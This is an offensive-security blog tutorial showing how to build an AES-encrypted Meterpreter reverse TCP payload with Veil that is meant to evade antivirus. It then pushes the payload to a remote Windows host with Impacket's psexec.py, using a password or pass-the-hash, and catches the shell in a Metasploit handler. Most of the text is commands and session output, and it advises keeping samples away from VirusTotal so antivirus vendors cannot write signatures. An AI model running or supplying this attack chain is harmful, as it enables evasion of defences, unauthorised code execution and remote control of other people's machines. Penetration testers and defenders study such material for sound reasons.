Veil + psexec.py = pwnage


Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it.

First of all, Veil is a nice little payload generator that will generate your windows payload all within Kali. It was created by Chris Truncer using some of the antivirus bypass techniques shared by Dave Kennedy and Debasish Mandal. Chris already has a nice tutorial on how to get setup and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine.

Finally, you can use CoreLab’s python version of psexec to execute your payload on a remote machine. To install, simply download the latest version of Impacket and run setup.py.

root@kali:~# wget http://impacket.googlecode.com/files/impacket-0.9.10.tar.gz
root@kali:~# tar -xzvf impacket-0.9.10.tar.gz
root@kali:~# cd impacket-0.9.10/
root@kali:~/impacket-0.9.10# python setup.py install

Let’s walk through a quick example of using both of these tools.

First, we generate a payload:

root@kali:/opt/Veil# python Veil.py 

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.81.201
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse TCP handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_tcp
 LHOST   = 192.168.81.201
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

root@kali:/opt/Veil# mv payload.exe TrustedSec.exe

Next, we start a multi/handler with “smart_migrate” enabled:

msf exploit(handler) > resource /root/scripts/msf/multi_handler/reverse_tcp.rc 
[*] Processing /root/scripts/msf/multi_handler/reverse_tcp.rc for ERB directives.
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> use multi/handler
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LPORT 443
LPORT => 443
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set AutoRunScript post/windows/manage/smart_migrate
AutoRunScript => post/windows/manage/smart_migrate
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

Now, we can use “psexec.py” to upload and execute our payload using username/password or username/hash:

Username/password example:
psexec.py TrustedSec:’InformationSecurityMadeSimple!’@192.168.81.129 cmd.exe

Username/hash example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 test@192.168.81.129 cmd.exe

Psexec session:

Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies
Trying protocol 445/SMB...
[*] Requesting shares on 192.168.81.139.....
[*] Found writable share ADMIN$
[*] Uploading file KDgwQrZj.exe
[*] Opening SVCManager on 192.168.81.139.....
[*] Creating service rWGK on 192.168.81.139.....
[*] Starting service rWGK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>put TrustedSec.exe
[*] Uploading TrustedSec.exe to ADMIN$\/
C:\Windows\system32>start TrustedSec.exe
C:\Windows\system32>del ..\\TrustedSec.exe
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 192.168.81.139.....
[*] Stoping service rWGK.....
[*] Removing service rWGK.....
[*] Removing file KDgwQrZj.exe.....

Reap the shellz:

[*] Sending stage (751104 bytes) to 192.168.81.129
[*] Meterpreter session 1 opened (192.168.81.201:443 -> 192.168.81.129:1038) at 2013-06-09 19:57:17 -0400
[*] Session ID 1 (192.168.81.201:443 -> 192.168.81.129:1038) processing AutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: TrustedSec.exe (1436)
[+] Migrating to 632
[+] Successfully migrated to process

BooYah!!!

Comments are closed.